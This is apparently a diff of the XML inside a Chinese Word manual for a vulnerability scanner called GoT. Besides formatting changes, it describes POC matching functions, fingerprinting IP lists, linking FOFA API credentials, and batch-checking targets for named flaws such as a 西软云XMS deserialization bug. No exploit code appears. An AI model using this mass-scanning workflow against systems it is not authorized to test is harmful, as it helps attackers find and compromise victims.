+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>json</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>": "</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>jsp:data</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>"</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6065,7 +6571,21 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>其中json的意思是</w:t>
+        <w:t>其中</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>的意思是</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -6090,12 +6610,14 @@
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>jsp</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -6151,7 +6673,21 @@
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
-              <w:t>要取的json数据，也就是取上面的</w:t>
+              <w:t>要取的</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>json</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>数据，也就是取上面的</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6414,8 +6950,16 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>输出header ,body ,status_code</w:t>
-      </w:r>
+        <w:t>输出header ,body ,</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>status_code</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6443,7 +6987,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId26"/>
+                    <a:blip r:embed="rId25"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6490,7 +7034,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId27"/>
+                    <a:blip r:embed="rId26"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6625,7 +7169,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId28"/>
+                    <a:blip r:embed="rId27"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6673,7 +7217,21 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>有时候咱们编写POC不知道高级函数变量的值是多少（也就是regex和json），不知道匹配的值是多少时，可以使用test函数进行测试</w:t>
+        <w:t>有时候咱们编写POC不知道高级函数变量的值是多少（也就是regex和</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>），不知道匹配的值是多少时，可以使用test函数进行测试</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6757,7 +7315,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId29"/>
+                    <a:blip r:embed="rId28"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6851,7 +7409,35 @@
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
-              <w:t>寻找到cms随后根据cms验证漏洞</w:t>
+              <w:t>寻找到</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>cms</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>随后根据</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>cms</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>验证漏洞</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6889,7 +7475,21 @@
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
-              <w:t>批量验证cms和漏洞</w:t>
+              <w:t>批量验证</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>cms</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>和漏洞</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6927,7 +7527,35 @@
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
-              <w:t>不进行漏洞验证和域名ip信息验证，只测试网站存活和cms信息</w:t>
+              <w:t>不进行漏洞验证和域名</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>ip</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>信息验证，只测试网站存活和</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>cms</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>信息</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6975,7 +7603,7 @@
       <w:pPr>
         <w:pStyle w:val="3"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
@@ -6988,6 +7616,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -7054,7 +7687,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId30"/>
+                    <a:blip r:embed="rId29"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -7086,7 +7719,7 @@
       <w:pPr>
         <w:pStyle w:val="3"/>
         <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
@@ -7106,6 +7739,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -7136,7 +7774,21 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -export csv=xxx 对ip.txt的ip进行指纹探测</w:t>
+        <w:t xml:space="preserve"> -export csv=xxx 对ip.txt的</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>进行指纹探测</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7166,7 +7818,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId31"/>
+                    <a:blip r:embed="rId30"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -7202,12 +7854,21 @@
         </w:rPr>
         <w:t>四，</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
-        <w:t>setting.json文件</w:t>
+        <w:t>setting.json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>文件</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7397,7 +8058,29 @@
           <w:szCs w:val="21"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>"fofa_email"</w:t>
+        <w:t>"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>fofa_email</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7462,7 +8145,29 @@
           <w:szCs w:val="21"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>"fafa_key"</w:t>
+        <w:t>"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>fafa_key</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7650,6 +8355,7 @@
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
@@ -7659,6 +8365,7 @@
               </w:rPr>
               <w:t>response_time</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -7710,6 +8417,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
@@ -7722,20 +8430,42 @@
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
-        <w:t>ofa联动</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>打开setting.json文件</w:t>
+        <w:t>ofa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>联动</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>打开</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>setting.json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>文件</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7765,7 +8495,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId32"/>
+                    <a:blip r:embed="rId31"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -7796,14 +8526,40 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>填入fofa的信息，默认vip是一万条信息一次</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+        <w:t>填入</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>fofa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>的信息，默认</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>vip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>是一万条信息一次</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -7825,7 +8581,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId33"/>
+                    <a:blip r:embed="rId32"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -7856,6 +8612,116 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:t>随后在command.txt中写入</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>fofa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>命令</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，比如app=</w:t>
+      </w:r>
+      <w:r>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>xxx</w:t>
+      </w:r>
+      <w:r>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>或者title=</w:t>
+      </w:r>
+      <w:r>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>xxx</w:t>
+      </w:r>
+      <w:r>
+        <w:t>”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17169BC4" wp14:editId="0A6FF8D6">
+            <wp:extent cx="4580952" cy="2247619"/>
+            <wp:effectExtent l="0" t="0" r="0" b="635"/>
+            <wp:docPr id="416690100" name="图片 1" descr="图片包含 图形用户界面&#10;&#10;描述已自动生成"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="416690100" name="图片 1" descr="图片包含 图形用户界面&#10;&#10;描述已自动生成"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId33"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4580952" cy="2247619"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
         <w:t>使用方法</w:t>
       </w:r>
     </w:p>
@@ -7869,41 +8735,77 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve">GoT </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">fofa -condition vuln="西软云XMS_FoxLookupInvoker接口存在反序列化漏洞" -proxy </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId34" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="ae"/>
-          </w:rPr>
-          <w:t>http://127.0.0.1:8080</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -export csv=123</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>直接从fofa中取出数据随后进行漏洞验证并导出到123.csv文件中</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t>GoT</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>fofa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -condition vuln="</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>漏洞名称</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">" </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>-export csv=123</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>直接从</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>fofa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>中取出数据随后进行漏洞验证并导出到123.csv文件中</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
@@ -7914,9 +8816,9 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C717802" wp14:editId="3981889F">
-            <wp:extent cx="5274310" cy="4149090"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C717802" wp14:editId="64E640C0">
+            <wp:extent cx="4419600" cy="3476724"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
             <wp:docPr id="1166112631" name="图片 1" descr="文本&#10;&#10;描述已自动生成"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -7929,7 +8831,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId35"/>
+                    <a:blip r:embed="rId34"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -7937,7 +8839,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5274310" cy="4149090"/>
+                      <a:ext cx="4421202" cy="3477984"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
